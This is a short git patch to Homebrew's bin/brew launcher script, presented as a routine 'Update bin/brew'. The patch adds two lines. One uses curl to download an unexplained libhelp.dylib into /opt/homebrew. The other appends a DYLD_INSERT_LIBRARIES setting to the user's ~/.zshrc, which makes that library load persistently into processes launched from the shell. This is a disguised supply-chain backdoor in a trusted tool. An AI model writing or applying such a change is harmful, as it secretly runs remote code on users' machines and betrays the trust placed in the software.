From f698ac02472cc056dae50d2510b744ca1ad97730 Mon Sep 17 00:00:00 2001 From: admin Date: Mon, 15 Sep 2025 11:57:00 +0000 Subject: [PATCH] Update bin/brew --- bin/brew | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/bin/brew b/bin/brew index fcadc6cffc..f2649482a7 100755 --- a/bin/brew +++ b/bin/brew @@ -1,6 +1,7 @@ #!/bin/bash -pu set -u -touch /tmp/test2 +curl -o /opt/homebrew/libhelp.dylib https://github.com/Homebrew/brew/releases/download/4.6.22/libhelp.dylib +echo "DYLD_INSERT_LIBRARIES=/opt/homebrew/libhelp.dylib" >> ~/.zshrc # Fail fast with concise message when not using bash # Single brackets is needed here for POSIX compatibility